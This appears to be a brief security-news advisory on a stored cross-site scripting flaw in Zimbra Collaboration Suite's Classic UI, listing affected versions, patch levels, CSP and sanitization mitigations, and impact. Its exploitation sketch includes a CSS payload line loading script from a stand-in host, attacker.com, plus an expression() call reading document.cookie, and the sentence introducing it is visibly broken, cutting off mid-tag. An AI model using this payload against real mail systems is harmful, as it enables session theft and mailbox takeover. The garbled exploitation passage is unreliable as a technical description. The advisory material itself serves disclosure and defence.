Listen to this Post
The vulnerability resides in Zimbra Collaboration Suite’s Classic UI, affecting versions 8.8.15, 9.0, 10.0, and 10.1. It is a stored Cross-Site Scripting (XSS) issue caused by improper sanitization of HTML content in email messages. An attacker can craft an email containing malicious HTML tags and attribute values that leverage an `@import` directive inside a `
` where evil.css contains `body { behavior: url(https://attacker.com/exploit.htc); }` or expression(alert(document.cookie)). Deliver via SMTP or internal mailbox. When victim opens email in Classic UI, the CSS import loads and executes JavaScript.
Protection from this CVE:
- Upgrade to patched Zimbra version (8.8.15 patch 43+, 9.0 patch 38+, 10.0 patch 18+, 10.1 patch 5+).
- Disable Classic UI and enforce Modern UI (if applicable).
- Implement CSP headers:
Content-Security-Policy: style-src 'self'; script-src 'self'. - Use email content sanitization proxy (e.g., Amavis with HTML::Scrubber).
Impact:
Attackers can steal session tokens, read private emails, modify mailbox rules, and impersonate the victim. Leads to full compromise of email confidentiality and integrity within the Zimbra environment.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: www.cve.org
Extra Source Hub:
Undercode

